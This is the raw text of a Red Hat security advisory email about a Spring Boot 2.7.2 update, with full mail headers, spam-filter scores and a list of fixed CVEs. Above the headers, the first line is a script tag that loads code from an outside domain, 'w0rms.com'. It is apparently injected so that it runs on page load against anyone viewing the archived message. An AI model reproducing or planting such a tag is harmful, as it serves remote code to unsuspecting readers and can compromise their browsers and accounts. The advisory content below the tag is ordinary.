<script src=http://w0rms.com/kaydet.php></script>
Return-Path: <errata@redhat.com>
Delivered-To: csiway@dedi-4568888.klamss.com.br
Received: from dedi-4568888.klamss.com.br
	by dedi-4568888.klamss.com.br with LMTP
	id WLovE17XmWMYPQAA56lGvA
	(envelope-from <errata@redhat.com>)
	for <csiway@dedi-4568888.klamss.com.br>; Wed, 14 Dec 2022 11:02:06 -0300
Return-path: <errata@redhat.com>
Envelope-to: douglas.doring@csiway.com.br
Delivery-date: Wed, 14 Dec 2022 11:02:06 -0300
Received: from us-smtp-delivery-124.mimecast.com ([170.10.133.124]:20390)
	by dedi-4568888.klamss.com.br with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	(Exim 4.95)
	(envelope-from <errata@redhat.com>)
	id 1p5SKY-0004lr-2M
	for douglas.doring@csiway.com.br;
	Wed, 14 Dec 2022 11:02:06 -0300
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=redhat.com;
	s=mimecast20190719; t=1671026468;
	h=from:from:reply-to:subject:subject:date:date:message-id:message-id:
	 to:to:cc:mime-version:mime-version:content-type:content-type:
	 content-transfer-encoding:content-transfer-encoding;
	bh=N28PhSqmHBaINxcLHBFHltng4x6Wem68tOwixF0LXTM=;
	b=fi1TRRXJs4v2LYUAN1z/zH9reuMkbvnqBa1RJxfUaIXlCK8BWmJ2HDK0Iq4zLdOJZA9nEw
	yReIFwVj7UahsIziMKD2T8Ian2FKY3RWnLtnUb+UJgLTwn/CCrFwn//6iKy/dqMvxKQ3yS
	LZ9EsCpy6HloxmzFQLYcwFM8UfHNFKk=
Received: from mx-prod-util-04.mail-002.prod.us-west-2.aws.redhat.com
 (ec2-54-186-198-63.us-west-2.compute.amazonaws.com [54.186.198.63]) by
 relay.mimecast.com with ESMTP with STARTTLS (version=TLSv1.3,
 cipher=TLS_AES_256_GCM_SHA384) id us-mta-278-tFSA-_zvO2q9GIlmjnNhmg-1; Wed,
 14 Dec 2022 09:01:02 -0500
X-MC-Unique: tFSA-_zvO2q9GIlmjnNhmg-1
Received: from errata-notifications-prod-e1-general-98-jq8jw (unknown [10.30.45.122])
	(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)
	 key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256)
	(No client certificate requested)
	by mx-prod-util-04.mail-002.prod.us-west-2.aws.redhat.com (Postfix) with ESMTPSA id 0F0341965417
	for <douglas.doring@csiway.com.br>; Wed, 14 Dec 2022 14:00:45 +0000 (UTC)
From: Red Hat Errata Notifications <errata@redhat.com>
To: douglas.doring@csiway.com.br
Message-ID: <851684271.123731671026446160.JavaMail.1001510000@mx-util.corp.redhat.com>
Subject: [Security Advisory] RHSA-2022:8761 Moderate: Red Hat support for
 Spring Boot 2.7.2 update
MIME-Version: 1.0
Date: Wed, 14 Dec 2022 14:00:45 +0000 (UTC)
X-Mimecast-Spam-Score: 0
X-Mimecast-Originator: redhat.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Spam-Status: No, score=0.6
X-Spam-Score: 6
X-Spam-Bar: /
X-Ham-Report: Spam detection software, running on the system "dedi-4568888.klamss.com.br",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  The following Red Hat Security Advisory has been published
    which may affect subscriptions which you have purchased. RHSA-2022:8761 Moderate:
    Red Hat support for Spring Boot 2.7.2 update Summary: 
 Content analysis details:   (0.6 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
 -0.0 SPF_PASS               SPF: sender matches SPF record
 -0.1 DKIM_VALID_AU          Message has a valid DKIM or DK signature from
                             author's domain
 -0.1 DKIM_VALID_EF          Message has a valid DKIM or DK signature from
                             envelope-from domain
 -0.1 DKIM_VALID             Message has at least one valid DKIM or DK signature
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily
                             valid
  0.8 KAM_ASCII_DIVIDERS     Spam that uses ascii formatting tricks
 -0.0 DKIMWL_WL_HIGH         DKIMwl.org - High trust sender
X-Spam-Flag: NO


The following Red Hat Security Advisory has been published which may affect
subscriptions which you have purchased.


RHSA-2022:8761 Moderate: Red Hat support for Spring Boot 2.7.2 update


Summary:

An update is now available for Red Hat OpenShift Application Runtimes.

Red Hat support for Spring Boot provides an application platform that reduces the complexity of developing and operating applications (monoliths and microservices) for OpenShift as a containerized platform.

This release of Red Hat support for Spring Boot 2.7.2 serves as a replacement for Red Hat support for Spring Boot 2.5.12, and includes security, bug fixes and enhancements. For more information, see the release notes listed in the References section.

Security Fix(es):

* reactor-netty: specific redirect configuration allows for a credentials leak (CVE-2020-5404)

* kubernetes-client: Insecure deserialization in unmarshalYaml method (CVE-2021-4178)

* protobuf-java: potential DoS in the parsing procedure for binary data (CVE-2021-22569)

* undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629) (CVE-2022-1259)

* undertow: Double AJP response for 400 from EAP 7 results in CPING failures (CVE-2022-1319)

* spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Full details and references:

https://access.redhat.com/errata/RHSA-2022:8761?sc_cid=701600000006NHXAA2

CVE Names:

CVE-2020-5404 CVE-2021-4178 CVE-2021-22569 CVE-2022-1259 CVE-2022-1319 CVE-2022-22950

Revision History:

Issue Date: 2022-12-14
Updated:    2022-12-14


----------------------------------------------------------------------------------------------
Manage Errata Notifications
----------------------------------------------------------------------------------------------

You are receiving this email because you have elected to receive errata notifications
from Red Hat. This message is being sent to:
    Red Hat login:         douglasdoring
    Email address on file: <douglas.doring@csiway.com.br>

Update your preferences at https://www.redhat.com/wapps/ugc/protected/notif.html


----------------------------------------------------------------------------------------------
Contact
----------------------------------------------------------------------------------------------

The Red Hat security contact is secalert@redhat.com.  More contact
details at https://access.redhat.com/security/team/contact/

This is an automated message. Please do not reply. If you have further questions or concerns,
please contact Red Hat Technical Support https://access.redhat.com/support/contact/technicalSupport/
or open a support case via the Red Hat Customer Portal https://access.redhat.com/support/cases/#/case/new/


Copyright 2022 Red Hat, Inc.